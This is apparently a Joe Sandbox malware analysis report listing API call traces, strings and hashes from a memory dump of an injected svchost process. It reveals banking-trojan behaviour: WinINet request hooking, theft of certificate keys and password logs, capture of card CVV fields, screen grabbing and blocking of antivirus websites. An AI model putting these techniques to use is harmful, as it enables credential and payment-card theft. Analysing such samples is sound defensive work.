                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,7556F550,00000000), ref: 02BC11AE
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02BC11C4
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,75571620), ref: 02BC11DC
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02BC11FE
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02BC120A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02BC1220
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02BC123C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02BC1258
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02BC1274
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02BC1290
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02BC12AC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02BC12C8
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02BC12E4
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02BC1300
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                                • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                                • API String ID: 1705253364-835984666
                                                                                                                                                                                                                • Opcode ID: 980d486a830d5dd33af5564a1a702f22dc6e65804566d5d2b1a321b415217f91
                                                                                                                                                                                                                • Instruction ID: f4f6018f828fddebdedf03968135cdc2f13fb75721a995a6c7ad327438100f9c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 980d486a830d5dd33af5564a1a702f22dc6e65804566d5d2b1a321b415217f91
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8631C374B9070A75FA607A794C02F6F235D8F40E84F3005D8BA46F61A7DBE5E6058978
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02BCF05D
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7280), ref: 02BCF09E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7280), ref: 02BCF0D2
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF0E7
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCF0F1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCF0F9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF10A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCF111
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCF14B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCF158
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7280,02BFFDB8,02BFFDB9), ref: 02BCF199
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF1D4
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCF1DE
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCF1E6
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF1F7
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCF1FE
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCF23B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCF248
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCF420,02BFFDB8,00000000,00000000), ref: 02BCF27E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCF296
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCF2A7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                                • String ID: 617D7280$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                                • API String ID: 448721894-991073507
                                                                                                                                                                                                                • Opcode ID: e10d9a2e3b1b462cecf1fe1bb88f87c716dcd74c8f9d48cbe0601735c7aaf50e
                                                                                                                                                                                                                • Instruction ID: a40e008f5cdfc6789f2f42f2f1a239d3e3b5d395a1176d1a2df148f7235146ba
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e10d9a2e3b1b462cecf1fe1bb88f87c716dcd74c8f9d48cbe0601735c7aaf50e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC712535A402059FDB218F38D858BFA7BE9EF45740F5486DAFA85C7240DB70DA45CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BCD278
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,found.), ref: 02BCD293
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,asus), ref: 02BCD2AE
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCD2D4
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCD30E
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCD318
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCD320
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCD32F
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCD336
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC,?,?), ref: 02BCD3D9
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCD413
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCD41D
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCD425
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCD434
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCD43B
                                                                                                                                                                                                                • FindNextFileA.KERNEL32(?,?), ref: 02BCD52F
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 02BCD563
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                                • String ID: .txt$.zip$617D73AC$asus$found.$keys$path
                                                                                                                                                                                                                • API String ID: 2233314381-3492321697
                                                                                                                                                                                                                • Opcode ID: 84fcb77d55f407c6100ba25c9e6472c27e50e7e880574c125f58b80588f56f23
                                                                                                                                                                                                                • Instruction ID: b56ec25e905ebdfc358b44389a83a9ed3b9076637d492f3544f602d54e6bf4fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84fcb77d55f407c6100ba25c9e6472c27e50e7e880574c125f58b80588f56f23
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1491F7345087468FCB25CB3894686ABBBE5EFC9345F188AACF9C6C7201EB31D549C791
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4037
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD4075
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD407F
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD4087
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD4098
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD409F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,?), ref: 02BD40FD
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 02BD410C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4137
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD4197
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C,?,00000000), ref: 02BD41D7
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD4237
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4297
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                                • API String ID: 2433436401-2965714029
                                                                                                                                                                                                                • Opcode ID: 87d53c091b9a0a839ae20097c293b5c05064792924f38c829254031ef4bfbc85
                                                                                                                                                                                                                • Instruction ID: d1b68cb65edd705c3b9f1cdcbce307dcf471cd9f3526383d3e65103712062aab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87d53c091b9a0a839ae20097c293b5c05064792924f38c829254031ef4bfbc85
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACB1FD3090064A5BDB2ACB7C98697FA7BF5FF49340F1489E4E996D7240FB719948C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BBDA2D
                                                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02BBDA3E
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: GetComputerNameA.KERNEL32(02BFF588,?), ref: 02BBD987
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: lstrlenA.KERNEL32(02BFF588,?,?,02BC76EC), ref: 02BBD992
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9D2
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9E2
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9F2
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBD9FF
                                                                                                                                                                                                                  • Part of subcall function 02BBD970: wsprintfA.USER32 ref: 02BBDA0C
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02BFF5A0), ref: 02BBDA6A
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDA83
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: SetThreadDesktop.USER32(?,7556F590,755616B0,?), ref: 02BB902F
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDC.USER32(00000000), ref: 02BB9037
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BB9048
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDeviceCaps.GDI32(00000000,00000008), ref: 02BB9059
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02BB9070
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02BB90B2
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02BB90C2
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: DeleteObject.GDI32(00000000), ref: 02BB90C5
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: ReleaseDC.USER32(00000000,00000000), ref: 02BB90CE
                                                                                                                                                                                                                  • Part of subcall function 02BB9020: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB9129
                                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BBDAB0
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDAC3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,02BFF670), ref: 02BBDAE1
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BBDAFF
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02BBDB20
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(02BFF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDB3D
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 02BBDB47
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BBDB61
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,02BFF630), ref: 02BBDB79
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BBDB97
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 02BBDBB8
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(02BFF630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDBD5
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BBDBDF
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BBDBFD
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BBDC10
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BBDC23
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,02BFF5DC), ref: 02BBDC39
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                  • Part of subcall function 02BD5930: CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                 • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                 • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapCloseCompatibleComputerCountDeleteDesktopErrorHandleLastLookupNameObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 3555772620-820036962
                                                                                                                                                                                                                • Opcode ID: 42ac57b92071214429b01ef6dbb1e150c22055e3cff6698e8fa3ff40fe6745af
                                                                                                                                                                                                                • Instruction ID: df667d3627288c3f3d38006f7ae830320e32ece895f1b270dee6159822760511
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42ac57b92071214429b01ef6dbb1e150c22055e3cff6698e8fa3ff40fe6745af
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F517B71FC0306BAF7719BA49C86FAA77A8AF44B41F104585B701EB2C0DBF4A5108F65
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,7556F380,00000000,00000001,00000000,?,?,?,02BC8A44,?,?,?,?,?), ref: 02BCE433
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE441
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE44D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE45B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE467
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE479
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCE48F
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCE4A2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02BCE50B
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02BCE512
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCE522
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCE580,00000000,00000000,00000000), ref: 02BCE548
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCE560
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCE571
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                 • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                 • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                                • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                                • API String ID: 1632825432-2817208116
                                                                                                                                                                                                                • Opcode ID: 2d47b643c78aeb60bf16da58e376c2c21393b2149405fda625538a2135f564df
                                                                                                                                                                                                                • Instruction ID: 6c05d480452d44691725d6c1e443c69198a0d7adebbaa025fa44fb1d99e5c30a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d47b643c78aeb60bf16da58e376c2c21393b2149405fda625538a2135f564df
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA416831A40B11AFE3220A386C59FAF279DCF45745F7842D8FA84E7252EB61D61983A4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02BC9B39
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC9B42
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02BC9B4C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC9B4F
                                                                                                                                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 02BC9B75
                                                                                                                                                                                                                • send.WS2_32(?,02BF9E4C,00000002,00000000), ref: 02BC9BCC
                                                                                                                                                                                                                • send.WS2_32(?,02BFE1CC,00000002,00000000), ref: 02BC9BF2
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 02BC9C18
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000001,00000000), ref: 02BC9C92
                                                                                                                                                                                                                • gethostbyname.WS2_32(00000005), ref: 02BC9CC7
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9D0D
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 02BC9D24
                                                                                                                                                                                                                • inet_ntoa.WS2_32(?), ref: 02BC9D37
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9D47
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BC9D5A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000005), ref: 02BC9D67
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC9D6E
                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 02BC9D7A
                                                                                                                                                                                                                • connect.WS2_32(?,?,00000010), ref: 02BC9D9C
                                                                                                                                                                                                                • send.WS2_32(?,?,0000000A,00000000), ref: 02BC9DB6
                                                                                                                                                                                                                • send.WS2_32(?,?,0000000A,00000000), ref: 02BC9DD0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC9970,?,00000000,00000000), ref: 02BC9DEA
                                                                                                                                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 02BC9CBC
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: shutdown.WS2_32(?,00000001), ref: 02BC990B
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: shutdown.WS2_32(02BC99EC,00000001), ref: 02BC9910
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: recv.WS2_32(02BC99EC,?,00000400,00000000), ref: 02BC992F
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: recv.WS2_32(?,?,00000400,00000000), ref: 02BC9945
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: closesocket.WS2_32(?), ref: 02BC9959
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: closesocket.WS2_32(02BC99EC), ref: 02BC995C
                                                                                                                                                                                                                  • Part of subcall function 02BC98F0: ExitThread.KERNEL32 ref: 02BC9960
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC9DFC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                 • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                 • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 699211285-0
                                                                                                                                                                                                                • Opcode ID: 464f55130aef19571fea108311acb62740dd3e672f40c0e3442866846667ad97
                                                                                                                                                                                                                • Instruction ID: ea03bcc03c383b92d390e7d23d3935b92d2247291f021160b5509921a45309a4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 464f55130aef19571fea108311acb62740dd3e672f40c0e3442866846667ad97
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A891AEB1648740BEF320EB748C85F7BBB99EB84740F64594DF682A7182D7B4E444CB62
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,avast.com,?,?,02BB62EC), ref: 02BB61CB
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,kaspersky,?,?,02BB62EC), ref: 02BB61DB
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,drweb,?,?,02BB62EC), ref: 02BB61E7
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,eset.com,?,?,02BB62EC), ref: 02BB61F3
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,antivir,?,?,02BB62EC), ref: 02BB61FF
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,avira,?,?,02BB62EC), ref: 02BB620B
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,virustotal,?,?,02BB62EC), ref: 02BB6217
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,virusinfo,?,?,02BB62EC), ref: 02BB6223
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,z-oleg.com,?,?,02BB62EC), ref: 02BB622F
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,trendsecure,?,?,02BB62EC), ref: 02BB623B
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,anti-malware,?,?,02BB62EC), ref: 02BB6247
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,.comodo.com,?,?,02BB62EC), ref: 02BB6253
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                 • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                 • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
